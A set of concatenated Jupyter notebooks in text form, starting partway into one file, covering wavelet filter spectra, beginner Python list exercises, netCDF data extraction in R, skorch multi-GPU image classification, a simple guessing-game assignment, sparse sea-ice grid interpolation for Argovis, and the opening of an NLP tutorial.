#icdf_53_lf = np.array([0 , 0 , 0, 1.0/2.0, 1.0 , 1.0/2.0, 0, 0 , 0 ])
#icdf_53_hf = np.array([0 , 0 , -1.0/8.0, -2.0/8.0, 6.0/8.0, -2.0/8.0, -1.0/8.0, 0 , 0 ])
#tcdf_97_lf = np.array([0.027, -0.017, -0.078, 0.267, 0.603, 0.267, -0.078, -0.017, 0.027])
#tcdf_97_hf = np.array([0.0 , 0.091, -0.056, -0.591, 1.115, -0.591, -0.056, 0.091, 0.0 ])
#icdf_97_lf = np.array([0.0 , -0.091, -0.056, 0.591, 1.115, 0.591, -0.056, -0.091, 0.0 ])
#icdf_97_hf = np.array([0.027, 0.017, -0.078, -0.267, 0.603, -0.267, -0.078, 0.017, 0.027])
tcdf_53_lf = np.array([-1.0/8.0, 2.0/8.0, 6.0/8.0, 2.0/8.0, -1.0/8.0, 0, 0, 0, 0])
tcdf_53_hf = np.array([-1.0/2.0, 1.0 , -1.0/2.0, 0 , 0 , 0, 0, 0, 0])
icdf_53_lf = np.array([ 1.0/2.0, 1.0 , 1.0/2.0, 0 , 0 , 0, 0, 0, 0])
icdf_53_hf = np.array([-1.0/8.0, -2.0/8.0, 6.0/8.0, -2.0/8.0, -1.0/8.0, 0, 0, 0, 0])
tcdf_97_lf = np.array([ 0.027, -0.017, -0.078, 0.267, 0.603, 0.267, -0.078, -0.017, 0.027])
tcdf_97_hf = np.array([ 0.091, -0.056, -0.591, 1.115, -0.591, -0.056, 0.091, 0.0 , 0 ])
icdf_97_lf = np.array([-0.091, -0.056, 0.591, 1.115, 0.591, -0.056, -0.091, 0.0 , 0 ])
icdf_97_hf = np.array([ 0.027, 0.017, -0.078, -0.267, 0.603, -0.267, -0.078, 0.017, 0.027])
print(np.sum(np.abs(tcdf_53_lf)*np.abs(tcdf_53_lf))/5)
print(np.sum(np.abs(tcdf_53_hf)*np.abs(tcdf_53_hf))/3)
Tcdf_53_lf = np.fft.fft(tcdf_53_lf)
Tcdf_53_hf = np.fft.fft(tcdf_53_hf)
Icdf_53_lf = np.fft.fft(icdf_53_lf)
Icdf_53_hf = np.fft.fft(icdf_53_hf)
Tcdf_97_lf = np.fft.fft(tcdf_97_lf)
Tcdf_97_hf = np.fft.fft(tcdf_97_hf)
Icdf_97_lf = np.fft.fft(icdf_97_lf)
Icdf_97_hf = np.fft.fft(icdf_97_hf)
fig = plt.figure()
plt.subplot(2, 1, 1)
plt.plot(np.abs(Tcdf_53_hf),'b', label = 'Analysis HP')
plt.plot(np.abs(Tcdf_53_lf),'r', label = 'Analysis LP')
plt.plot(np.abs(Icdf_53_hf),'c', label = 'Synthesis HP')
plt.plot(np.abs(Icdf_53_lf),'m', label = 'Synthesis LP')
plt.grid(True)
plt.legend()
plt.title('CDF 5/3 filter frequency response')
fig = plt.figure()
plt.subplot(2, 1, 2)
plt.plot(np.abs(Tcdf_97_hf),'b', label = 'Analysis HP')
plt.plot(np.abs(Tcdf_97_lf),'r', label = 'Analysis LP')
plt.plot(np.abs(Icdf_97_hf),'c', label = 'Synthesis HP')
plt.plot(np.abs(Icdf_97_lf),'m', label = 'Synthesis LP')
plt.grid(True)
plt.legend()
plt.title('CDF 9/7 filter frequency response')
# -
# ## Image spectrum
# +
nb = ia.nbshow(2)
nb.nbshow(f,'f: Input, mean: %3.2f' % (np.mean(f),))
F = np.fft.fft2(f)
nb.nbshow(ia.dftview(F), "F: DFT da original")
nb.nbshow()
r,c = f.shape
lowf = wave1d(f,0,0,0)
nb.nbshow(ia.normalize(lowf) ,'lowf: low-pass, mean: %3.2f' % (np.mean(lowf),))
Flow = np.fft.fft2(lowf)
nb.nbshow(ia.dftview(Flow), "Flow: DFT of the horizontal low-pass")
nb.nbshow()
highf = wave1d(f,1,0,0)
nb.nbshow(ia.normalize(highf),'highf: high-pass filtered image, mean: %3.2f' % (np.mean(highf),))
Fhigh = np.fft.fft2(highf)
nb.nbshow(ia.dftview(Fhigh), "Fhigh: DFT of the horizontal high-pass")
nb.nbshow()
# -
# ## Image spectrum after the wavelet transform
H,W = f.shape
g = wave2d(f,0,0)
ia.adshow(ia.normalize(g),'CDF 5/3 wavelet transform')
FLL = np.fft.fft2(g[:H//2,:W//2])
FLH = np.fft.fft2(g[:H//2,W//2:])
FHL = np.fft.fft2(g[H//2:,:W//2])
FHH = np.fft.fft2(g[H//2:,W//2:])
nb = ia.nbshow(ncols=2)
nb.nbshow(ia.dftview(FLL))
nb.nbshow(ia.dftview(FLH))
nb.nbshow(ia.dftview(FHL))
nb.nbshow(ia.dftview(FHH))
Fview = ia.dftview(np.fft.fft2(f))
Fview[H//4:1+H//4,:]=255
Fview[3*H//4:1+3*H//4,:]=255
Fview[:,W//4:1+W//4]=255
Fview[:,3*W//4:1+3*W//4]=255
nb.nbshow(Fview)
nb.nbshow()
| master/wavelets.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [Root]
# language: python
# name: Python [Root]
# ---
# + [markdown] id="3oxedQvB1c5p" colab_type="text" slideshow={"slide_type": "skip"}
# <table>
# <tr align=left><td><img align=left src="https://drive.google.com/uc?export=view&id=1edefIUL_iwWk4K3KtrNynSJ0Qvpdb2YY">
# <td>Text provided under a Creative Commons Attribution license, CC-BY. All code is made available under the FSF-approved MIT license. (c) <NAME></td>
# </table>
# + [markdown] id="Xq_hs1jGRtLR" colab_type="text"
# *“People think that computer science is the art of geniuses but the actual reality is the opposite, just many people doing things that build on each other, like a wall of mini stones.”*
#
# __<NAME>__
# + [markdown] id="zYW3ZR0NSLk7" colab_type="text"
# ## Problems
# + [markdown] id="Lw7Zrm0lJ52N" colab_type="text"
# * Find the maximum value in a list, without using built-in functions
# + id="RUcWXtUQJ9E0" colab_type="code" colab={}
# + [markdown] id="B72fnfAPFZNz" colab_type="text"
# * Print all the negative numbers in a list
# + id="JiCFfhv2FZWL" colab_type="code" colab={}
# + [markdown] id="FP5SChrPE1qp" colab_type="text"
# * Sort a list of numbers
# + id="HXJhejw4FLsy" colab_type="code" colab={}
# + [markdown] id="OKKbv1BKFMex" colab_type="text"
# - Given a number n, write all possible permutations of the integers between 1 and n
# + id="1f_EIYa9FMp2" colab_type="code" colab={}
# + [markdown] id="PgqWFNG5MH_S" colab_type="text"
# - Find all pairs of elements in a list whose sum equals a specified number
# + id="CUESPjKTMIJS" colab_type="code" colab={}
# + [markdown] id="w6aG4ekFFfv8" colab_type="text"
# - Compute the average and the sum of the elements in a list
# + id="-91xnpfrFf3S" colab_type="code" colab={}
# + [markdown] id="47xu0dynFw9R" colab_type="text"
# - Compute the sum of the elements of two lists
# + id="MzX3bSIxFxIa" colab_type="code" colab={}
# + [markdown] id="S599fJnrLlk7" colab_type="text"
# * Find the second largest element in a list
# + id="Uvy08g4MLlxU" colab_type="code" colab={}
# + [markdown] id="kluLrKL7LphH" colab_type="text"
# * Merge the elements of two lists into a single sorted list
# + id="9PisdmFlLprA" colab_type="code" colab={}
# + [markdown] id="1emFpwGjL6o9" colab_type="text"
# * Find the two elements of a list with the largest difference between them
# + id="O4FldweFcSAj" colab_type="code" colab={}
# + [markdown] id="GjFkz87icRKv" colab_type="text"
# * Find the two elements of a list whose sum is closest to zero
# + id="ycutVAZZL6wL" colab_type="code" colab={}
# + [markdown] id="gbgnZsxccVJc" colab_type="text"
# * Compute the list that results from the union of the elements of two other lists
# + id="lEOuUIJNcVUE" colab_type="code" colab={}
# + [markdown] id="AxQWaXKjcYGm" colab_type="text"
# * Compute the list that results from the intersection of the elements of two other lists
# + id="P0QvK-JrcYPl" colab_type="code" colab={}
# + [markdown] id="CUX_zeJKcand" colab_type="text"
# * Given a set of elements in a list, compute its [histogram](https://es.wikipedia.org/wiki/Histograma)
# + id="aC8aejmlcaym" colab_type="code" colab={}
# + [markdown] id="FN4kJotHcdX0" colab_type="text"
# * Convert a text from Morse code to English and vice versa
# + id="loTsOI4CcdiU" colab_type="code" colab={}
# + [markdown] id="zXCcY8eAcf1r" colab_type="text"
# * Determine whether a text string is a palindrome or not
# + id="Nwmr27ZscgAG" colab_type="code" colab={}
| Exercises/05_List.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R
# language: R
# name: ir
# ---
# This is a simple script that demonstrates how to open netcdf files (a typical format of file used for storing large amounts of data, and often used to display output from 3D Earth system models). This example uses a version of the marine reservoir ages output from Butzin et al. 2017.
# load required packages
library(ncdf4)
library(maps)
#Open netcdf file
nc <- nc_open( "mra14_intcal13_pd_21kcalBP.nc")
#list names of variables in netcdf file
names(nc$var)
#list names of dimensions in netcdf file
names(nc$dim)
# Let's say you want to extract the marine reservoir ages at a specific location for which you have the longitude, latitude and depth (e.g. -55.1°N, -70°E, 1250 m). The following is the code for how to extract such data.
#Let's have a look at the matrix containing the variable of interest, in this case the marine reservoir ages ("MRA")
nc_var <- ncvar_get( nc, varid="MRA" )
#list how many dimensions the matrix has
dim(nc_var)
#Note how this compares to the number of entries in each dimension
length(nc$dim$lon$vals)
length(nc$dim$lat$vals)
length(nc$dim$depth$vals)
# +
#The matrix containing our variable is made up of the following [lon,lat,depth]
#Lets try to extract the data for our core site
#First define the variables
input_lat = -55.1
input_lon = -70
input_depth = 1250
#Now find the location in the matrix that corresponds to our data.
#It is likely that your core is not at the exact location as each data point in the cdf file,
#so you will have to find the nearest grid point
#Extract the vectors of values along each dimension
nc_lat<-nc$dim$lat$vals
nc_lon<-nc$dim$lon$vals
nc_depth<-nc$dim$depth$vals
#This is written in a loop to make it easier when you have more than one site
index_vals=NULL
for(i in 1:length(input_lat)){
lat_index<-which(abs(nc_lat-input_lat[i])==min(abs(nc_lat-input_lat[i])))
#longitudes may need correcting from -180 to 180 ---> 0 to 360
input_lon2<-ifelse(input_lon[i]< min(nc$dim$lon$vals), input_lon[i]+360, input_lon[i])
lon_index<-which(abs(nc_lon-input_lon2)==min(abs(nc_lon-input_lon2)))
depth_index<-which(abs(nc_depth-input_depth[i])==min(abs(nc_depth-input_depth[i])))
a<-data.frame(lat_index=lat_index,lon_index=lon_index,depth_index=depth_index)
index_vals<-rbind(index_vals,a)
}
index_vals
#Now use these index values to look up the MRA at the core site in the variable matrix
MRA_output=NULL
for(i in 1:nrow(index_vals)){
MRA<-nc_var[index_vals$lon_index[i],index_vals$lat_index[i],index_vals$depth_index[i]]
MRA_output<-rbind(MRA_output,MRA)
}
MRA_output
# -
# The same principle can be used to extract marine reservoir ages from multiple sites. You can import an Excel sheet containing all of your longitudes, latitudes and depths, and output the data as a csv file.
#This package lets you read in excel docs
require(gdata)
input_cores<- read.xls("All_chilean_margin_cores.xlsx", sheet=1, header=TRUE)
#See the top few lines of your excel file
head(input_cores)
# +
#Define the input variables
input_lat = input_cores$Lat..oN.
input_lon = input_cores$Long..oE.
input_depth = input_cores$WD..m.
#Again apply the function to find the index locations of each site within the variable matrix
index_vals=data.frame(lat_index=numeric(0),lon_index=numeric(0),depth_index=numeric(0))
for(i in 1:length(input_lat)){
lat_index<-which(abs(nc_lat-input_lat[i])==min(abs(nc_lat-input_lat[i])))
#longitudes may need correcting from -180 to 180 ---> 0 to 360
input_lon2<-ifelse(input_lon[i]< min(nc$dim$lon$vals), input_lon[i]+360, input_lon[i])
lon_index<-which(abs(nc_lon-input_lon2)==min(abs(nc_lon-input_lon2)))
depth_index<-which(abs(nc_depth-input_depth[i])==min(abs(nc_depth-input_depth[i])))
a <- data.frame(lat_index=lat_index,lon_index=lon_index,depth_index=depth_index)
index_vals<-rbind(index_vals,a)
}
#Now use these index values to look up the MRA at each core site in the variable matrix
MRA_output=NULL
for(i in 1:nrow(index_vals)){
MRA<-nc_var[index_vals$lon_index[i],index_vals$lat_index[i],index_vals$depth_index[i]]
MRA_output<-rbind(MRA_output,MRA)
}
#Add the output to the original datafile
input_cores["MRA"]<- MRA_output
#Display datafile
input_cores
#Output as csv file
write.csv(input_cores,"input_cores_with_MRA.csv")
| Jupyter_notebooks/Extracting_data_from_model_netcdf_and_plotting.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import os
from urllib import request
from zipfile import ZipFile
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
from torchvision import datasets, models, transforms
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
# +
from skorch import NeuralNetClassifier
from skorch.helper import predefined_split
torch.manual_seed(360);
# -
NUM_WORKERS = 16
BATCH_SIZE = 32
for i in range(torch.cuda.device_count()):
print(torch.cuda.get_device_name(i))
# # Load data
# +
def download_and_extract_data(dataset_dir=""):
data_zip = os.path.join(dataset_dir, "hymenoptera_data.zip")
data_path = os.path.join(dataset_dir, "hymenoptera_data")
url = "https://download.pytorch.org/tutorial/hymenoptera_data.zip"
if not os.path.exists(data_path):
if not os.path.exists(data_zip):
print("Starting to download data...")
data = request.urlopen(url, timeout=300).read()
with open(data_zip, "wb") as f:
f.write(data)
print("Starting to extract data...")
with ZipFile(data_zip, "r") as zip_f:
zip_f.extractall(dataset_dir)
print("Data has been downloaded and extracted to {}.".format(dataset_dir))
download_and_extract_data()
# +
data_dir = "hymenoptera_data"
train_transforms = transforms.Compose(
[
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
)
val_transforms = transforms.Compose(
[
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
)
train_ds = datasets.ImageFolder(os.path.join(data_dir, "train"), train_transforms)
val_ds = datasets.ImageFolder(os.path.join(data_dir, "val"), val_transforms)
# -
class PretrainedModel(nn.Module):
def __init__(self):
super().__init__()
model = models.resnet18(pretrained=True)
num_ftrs = model.fc.in_features
model.fc = nn.Linear(num_ftrs, 2)
self.model = model
def forward(self, x):
return self.model(x)
model = PretrainedModel()
# +
if torch.cuda.device_count() > 1:
print("Let's use", torch.cuda.device_count(), "GPUs!")
# dim = 0 [30, xxx] -> [10, ...], [10, ...], [10, ...] on 3 GPUs
model = nn.DataParallel(model)
model = model.to(device)
# -
net = NeuralNetClassifier(
model,
criterion=nn.CrossEntropyLoss,
lr=0.001,
batch_size=BATCH_SIZE,
max_epochs=25,
# module__output_features=2,
optimizer=optim.SGD,
optimizer__momentum=0.9,
iterator_train__shuffle=True,
iterator_train__num_workers=NUM_WORKERS,
iterator_valid__shuffle=True,
iterator_valid__num_workers=NUM_WORKERS,
train_split=predefined_split(val_ds),
device=device, # comment to train on cpu
)
net.fit(train_ds, y=None);
| skorch-multi-gpu.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
for x in range(1, 100):
    if x % 3 == 0 and x % 5 == 0:
        print("DogCat")
    elif x % 5 == 0:
        print("Cat")
    elif x % 3 == 0:
        print("Dog")
    else:
        print(x)
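# The same logic can be factored into a small helper function (a hypothetical refactor, not part of the assignment text) that is easy to test:

```python
def dog_cat(x):
    # Return "Dog" for multiples of 3, "Cat" for multiples of 5,
    # "DogCat" for multiples of both, and the number itself otherwise.
    if x % 15 == 0:
        return "DogCat"
    if x % 5 == 0:
        return "Cat"
    if x % 3 == 0:
        return "Dog"
    return str(x)

print([dog_cat(x) for x in (3, 5, 15, 7)])  # ['Dog', 'Cat', 'DogCat', '7']
```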
import random
num = random.randint(1,100)
print (num)
import random
num = random.randint(1,100)
print(num)
a = int(input())
if a > 100 or a < 1:
    print("Out of Bounds")
elif abs(a - num) <= 10:
    print("Warm!")
else:
    print("Cold!")
import random
num = random.randint(1,100)
a = int(input())
print(num)
if a > 100 or a < 1:
    print("Out of Bounds")
elif abs(a - num) <= 10:
    print("Warm!")
else:
    print("Cold!")
import random
num = random.randint(1,100)
a = int(input())
print(num)
if a > 100 or a < 1:
    print("Out of Bounds")
elif abs(a - num) <= 10:
    print("Warm!")
else:
    print("Cold!")
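# Pulling the comparison logic into a function (a hypothetical refactor) separates it from the input/output handling and makes it testable:

```python
def check_guess(guess, target):
    # Classify a guess relative to the secret number:
    # out of the 1-100 range, within 10 of the target, or farther away.
    if guess > 100 or guess < 1:
        return "Out of Bounds"
    if abs(guess - target) <= 10:
        return "Warm!"
    return "Cold!"

print(check_guess(57, 50))   # Warm!
print(check_guess(5, 50))    # Cold!
print(check_guess(150, 50))  # Out of Bounds
```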
| Assignment.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python argo
# language: python
# name: argo
# ---
# # Make Non-Uniform Sparse Data Maps In Python
#
# Lately, I have been working with gridded data sets. Climate scientists and oceanographers have been fervently creating gridded data sets from satellite and in situ data. For example, see the [Argo gridded product page](https://argo.ucsd.edu/data/argo-data-products/) for ocean grids, or [here for precipitation](https://gpm.nasa.gov/data). There are also vector grids available for wind: the [CCMP Wind Vector Analysis Product](http://www.remss.com/measurements/ccmp/). [The Interactive Multisensor Snow and Ice Mapping System (IMS)](https://www.natice.noaa.gov/ims/) is another great example.
#
# Grids do not have to be global, such as the [Southern Ocean State Estimate (SOSE)](http://sose.ucsd.edu/).
#
# I am working on making a [gridded product](https://www.itsonlyamodel.us/mle-gradient-derivation.html).
#
# Gridded data is usually saved as TIFF files, and there are many tools available to work with these images. However, TIFF files assume the grid is uniform, with latitude spaced the same way as longitude. The IMS and SOSE grids are non-uniform and have to be re-gridded (interpolated onto a uniform grid).
#
# ## Argovis grid module
#
# [Argovis](https://argovis.colorado.edu/ng/grid?presLevel=0&date=2013-01-01&shapes=%5B%5B-40,-70,0,-30%5D%5D&gridName=sose_si_area_1_day_sparse&interpolateBool=false&colorScale=ice&inverseColorScale=false&paramMode=false&param=SIarea&gridDomain=%5B0,0.82%5D) has visualization and data delivery capabilities for a few gridded products, including the SOSE sea-ice coverage percentage shown below.
#
# 
#
# There is very little ice in the domain covered by SOSE, making this dataset sparse. The MongoDB database stores data only for grid cells that contain sea ice, making the data payload about $\frac{1}{5}$ of what it would otherwise be. Visualizing the grid on Argovis requires the grid to be de-sparsed and re-gridded onto a uniform rectangular grid. The Leaflet map uses the [Leaflet CanvasLayer](https://github.com/tylertucker202/Leaflet.CanvasLayer.Field) plugin, which extends the Leaflet map to include HTML canvas elements of uniformly gridded data.
#
# ## Implementation of Regridding
#
# I am going to show you how gridded data is output from MongoDB, and how the front end charts the non-uniform data on Argovis. Although Argovis implements this in TypeScript, this notebook uses Python. The process is identical.
import requests
import pandas as pd
import numpy as np
from scipy.interpolate import griddata
import cmocean
import matplotlib.pylab as plt
from scipy import interpolate
import itertools
import cartopy.crs as ccrs
# 1. We make two API calls: one for the sparse data, the other for the grid points falling within the lat-lon window. The functions below call the API. By the way, I wrote this [API documentation](https://argovis.colorado.edu/api-docs/) using Swagger. You can see in more detail what each API call outputs. Swagger gives examples, and even lets you make API calls of your own!
# +
def get_grid(gridName, latRange, lonRange, date, presLevel):
url = 'https://argovis.colorado.edu/griddedProducts/nonUniformGrid/window?'
url += 'gridName={}'.format(gridName)
url += '&presLevel={}'.format(presLevel)
url += '&date={}'.format(date)
url += '&latRange={}'.format(latRange)
url += '&lonRange={}'.format(lonRange)
url = url.replace(' ', '')
# Consider any status other than 2xx an error
print(url)
resp = requests.get(url)
if not resp.status_code // 100 == 2:
return "Error: Unexpected response {}".format(resp)
grid = resp.json()
return grid[0]
def get_grid_coords(gridName, latRange, lonRange):
url = 'https://argovis.colorado.edu/griddedProducts/gridCoords?'
url += 'gridName={}'.format(gridName)
url += '&latRange={}'.format(latRange)
url += '&lonRange={}'.format(lonRange)
url = url.replace(' ', '')
# Consider any status other than 2xx an error
print(url)
resp = requests.get(url)
if not resp.status_code // 100 == 2:
return "Error: Unexpected response {}".format(resp)
grid = resp.json()
return grid[0]
# -
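# As an aside, the query string built by concatenation above can also be assembled with the standard library's `urlencode`, which handles encoding automatically (the parameter names below mirror the hand-built URL; the server receives percent-encoded values, as it would from most HTTP clients):

```python
from urllib.parse import urlencode

# Same query parameters as the hand-built URL above.
params = {
    "gridName": "sose_si_area_1_day_sparse",
    "presLevel": 0,
    "date": "2013-01-04",
    "latRange": "[-70,-65]",
    "lonRange": "[0,40]",
}
query = urlencode(params)
url = "https://argovis.colorado.edu/griddedProducts/nonUniformGrid/window?" + query
print(url)
```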
latRange=[-70, -65]
lonRange=[0, 40]
gridName='sose_si_area_1_day_sparse'
date='2013-01-04'
presLevel=0
grid = get_grid(gridName, latRange, lonRange, date, presLevel)
gridCoords = get_grid_coords(gridName, latRange, lonRange)
# 2. We define our uniform grid, spaced by $\frac{1}{4}$ degree in longitude and $\frac{1}{2}$ degree in latitude.
lats = np.array(gridCoords['lats'])
lons = np.array(gridCoords['lons'])
dx, dy = .25, .5
x = np.arange(min(lons), max(lons), dx)
y = np.arange(min(lats), max(lats), dy)
xi, yi = np.meshgrid(x, y)
# 3. De-sparse the non-uniform grid: fill a dense array of zeros and insert the reported values at the matching coordinate indices.
xv, yv = np.meshgrid(lons, lats)
ice = np.zeros(xv.shape)
lngLat = []
vals = []
for row in grid['data']:
lat_idx = np.where(lats == row['lat'])
lon_idx = np.where(lons == row['lon'])
ice[lat_idx, lon_idx] = row['value']
lngLat.append((row['lon'], row['lat']))
vals.append(row['value'])
# 4. Interpolate the de-sparsed grid onto the uniform grid.
#
# Some thought needs to go into how we interpolate. We can 'cheat' by using SciPy's `griddata` function, which builds a Delaunay triangulation and interpolates on that mesh. The source code points to a class [LinearNDInterpolator](https://github.com/scipy/scipy/blob/v1.5.2/scipy/interpolate/interpnd.pyx) that uses [Qhull](http://www.qhull.org/). If we were to do this on the front end, we would have to write this routine in TypeScript. Instead, I wrote a simpler algorithm that takes advantage of the rectangular structure of our grid. We will compare the two.
grid_cheat = griddata(lngLat, vals, (xi, yi), method='linear')
# Our algorithm uses binary search to find, for each interpolation point, the four surrounding points of the non-uniform grid, and then does a bilinear interpolation.
# +
def find_closest_idx(arr, target):
arrLen = len(arr)
# Corner cases
if (target <= arr[0]):
return (0, 1)
if (target >= arr[arrLen - 1]):
return (arrLen - 1, -1)
# Doing iterative binary search
idx = 0; jdx = arrLen-1; mid = 0
while (idx < jdx):
mid = int((idx + jdx) / 2)
if (arr[mid] == target): # target is midpoint
return (mid, 1)
if (arr[idx] == target): #target is left edge
return (idx, 1)
if (target < arr[mid]): # search to the left of mid
# If target is greater than previous
# to mid, return closest of two
if (mid > 0 and target > arr[mid - 1]):
return get_closest_idx(arr[mid - 1], arr[mid], mid-1, target)
# Repeat for left half
jdx = mid
else: # search to the right of mid
if (mid < arrLen - 1 and target < arr[mid + 1]):
return get_closest_idx(arr[mid], arr[mid+1], mid, target)
idx = mid + 1
# Only a single element is left after the search
return (mid, 1)
def get_closest_idx(val1, val2, val1_idx, target):
if (target - val1 >= val2 - target):
return (val1_idx+1, -1)
else:
return (val1_idx, 1)
# -
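# As a sanity check, the nearest-index search can be reproduced with the standard library's `bisect` module (a standalone sketch, assuming the coordinate array is sorted ascending, as the netCDF dimension values are):

```python
import bisect

def nearest_index(arr, target):
    # Index of the element of sorted arr closest to target (ties go left).
    j = bisect.bisect_left(arr, target)
    if j == 0:
        return 0
    if j == len(arr):
        return len(arr) - 1
    return j - 1 if target - arr[j - 1] <= arr[j] - target else j

lats_demo = [-70.0, -69.5, -68.9, -68.3, -67.8]
print(nearest_index(lats_demo, -68.7777))  # 2 (closest value is -68.9)
```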
# Here is an example that shows what is going on for a single interpolation point.
# +
iPoint = (14, -68.7777) # Example interpolation point
def find_surrounding_points(iPoint, print_me=False):
lat_idx, lat_shift = find_closest_idx(lats, iPoint[1])
lon_idx, lon_shift = find_closest_idx(lons, iPoint[0])
llPoint = (lons[lon_idx], lats[lat_idx], ice[lat_idx, lon_idx])
lrPoint = (lons[lon_idx+lon_shift], lats[lat_idx], ice[lat_idx, lon_idx+lon_shift])
urPoint = (lons[lon_idx+lon_shift], lats[lat_idx+lat_shift], ice[lat_idx+lat_shift, lon_idx+lon_shift])
ulPoint = (lons[lon_idx], lats[lat_idx+lat_shift], ice[lat_idx+lat_shift, lon_idx])
points = [llPoint, lrPoint, urPoint, ulPoint]
if print_me:
print(f'interpolated point: {iPoint}')
print(f'lat_idx: {lat_idx}, lon_idx: {lon_idx}')
print(f'lats[lat_idx]: {lats[lat_idx]}, lons[lon_idx]: {lons[lon_idx]}')
print(f'lats[lat_idx+lat_shift]: {lats[lat_idx+lat_shift]}, lons[lon_idx+lon_shift]: {lons[lon_idx + lon_shift]}')
x, y = [point[0] for point in points], [point[1] for point in points]
return (points, (x, y))
points, (x, y) = find_surrounding_points(iPoint, True)
# -
# Below is a diagram of the points found by the nearest neighbor algorithm.
# +
def plot_interpolation_point(x, y, iPoint, loc="lower center"):
fig = plt.figure(figsize=(8,8))
ax = plt.axes()
ax.scatter(x, y, label='surrounding data')
ax.scatter(iPoint[0], iPoint[1], label='interpolation point')
ax.set_title('Interpolation point and surrounding data')
ax.set_ylabel('lat')
ax.set_xlabel('lon')
ax.legend(loc=loc)
plot_interpolation_point(x, y, iPoint)
# -
# Our interpolation point (orange) lies on or within our non-uniform grid points (blue). The bilinear interpolation function is as follows.
# +
def bilinear_interpolation(x, y, points):
'''Interpolate (x,y) from values associated with four points.
The four points are a list of four triplets: (x, y, value).
The four points can be in any order. They should form a rectangle.
>>> bilinear_interpolation(12, 5.5,
... [(10, 4, 100),
... (20, 4, 200),
... (10, 6, 150),
... (20, 6, 300)])
165.0
'''
# See formula at: http://en.wikipedia.org/wiki/Bilinear_interpolation
points = sorted(points) # order points by x, then by y
(x1, y1, q11), (_x1, y2, q12), (x2, _y1, q21), (_x2, _y2, q22) = points
if x1 != _x1 or x2 != _x2 or y1 != _y1 or y2 != _y2:
raise ValueError('points do not form a rectangle')
if not x1 <= x <= x2 or not y1 <= y <= y2:
raise ValueError('(x, y) not within the rectangle')
return (q11 * (x2 - x) * (y2 - y) +
q21 * (x - x1) * (y2 - y) +
q12 * (x2 - x) * (y - y1) +
q22 * (x - x1) * (y - y1)
) / ((x2 - x1) * (y2 - y1) + 0.0)
print(bilinear_interpolation(iPoint[0], iPoint[1], points))
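# The bilinear formula is equivalent to two 1-D linear interpolations: along x on the bottom and top edges, then along y between the two results. A standalone sketch with `np.interp` (a hypothetical helper, not the function used above) reproduces the docstring value:

```python
import numpy as np

def bilerp(x, y, x1, x2, y1, y2, q11, q21, q12, q22):
    # Interpolate along x on the bottom (y1) and top (y2) edges,
    # then along y between the two intermediate results.
    bottom = np.interp(x, [x1, x2], [q11, q21])
    top = np.interp(x, [x1, x2], [q12, q22])
    return float(np.interp(y, [y1, y2], [bottom, top]))

print(bilerp(12, 5.5, 10, 20, 4, 6, 100, 200, 150, 300))  # 165.0
```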
# +
iPoints = [ (xi.flatten()[idx], yi.flatten()[idx]) for idx in range(len(xi.flatten()))]
iGrid = []
for iPoint in iPoints:
points, (_, _) = find_surrounding_points(iPoint)
iVal = bilinear_interpolation(iPoint[0], iPoint[1], points)
iGrid.append(iVal)
iGrid = np.array(iGrid).reshape(xi.shape)
# -
iGrid.shape
# ## Comparison
#
# Our algorithm follows the ocean contours rather well, yet there is still some overlap; a land mask would prevent this grid from reporting ice on land. See the map below.
map_proj = ccrs.AzimuthalEquidistant(central_latitude=-90)
fig = plt.figure(figsize=(10,10))
ax = plt.axes(projection=map_proj)
ax.contourf(xi, yi, iGrid, 60, transform=ccrs.PlateCarree(), cmap=cmocean.cm.ice)
ax.coastlines()
# Scipy's interpolation reports ice over sea regions where there should not be any, as seen by the lighter blue 'fingers' in the figure below. Delaunay triangles are connecting ice sheets that do not reflect what the data reports.
fig = plt.figure(figsize=(10,10))
ax = plt.axes(projection=map_proj)
ax.contourf(xi, yi, grid_cheat, 60, transform=ccrs.PlateCarree(), cmap=cmocean.cm.ice)
ax.coastlines()
# # Final remarks
#
# We have seen that regridding with Delaunay triangulation can introduce artifacts that are not in the data. Taking advantage of the non-uniform grids' rectangular structure helps prevent this from happening. The inclusion of a land mask would help eliminate sea-ice-over-land artifacts. I am considering adding a land mask in later iterations of the Argovis grid module that would take care of this.
#
# For gridded product comparison, regridding on the browser also provides a means to compare two separate grids, where one grid is interpolated using the coordinates of another. While useful, interpolation should be used with caution. Interpolation can introduce artifacts.
#
# A final remark: regridding is a necessary step when making these charts, but it adds overhead. Although the routine is written in TypeScript, it may be faster to implement some or all of the nearest neighbor algorithm in a language like Rust or C++ and compile it to WebAssembly.
#
# It has been a pleasure writing this article. I hope you find it useful, or at least entertaining!
| gridding/make_non_uniform_sparse_grids_in_python.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <h4>Unit 1</h4> <h1 style="text-align:center">Chapter 1</h1>
#
# ---
import re
import logging
from importlib import reload
reload(logging)
import sys
logging.basicConfig(format='Explanation | %(levelname)s : %(message)s', level=logging.INFO, stream=sys.stdout)
log = logging.getLogger("Zero to Hero in NLP")
#
# ### Regular Expressions
# > Regular expressions can be used to specify patterns of strings we might want to extract from a document.
#
# ### Text Normalization
# > Text normalization is a set of tasks used to convert text into a more convenient, and standard form.
#
# * <strong>Tokenization</strong>
# * A method to separate words from running text.<br>
#
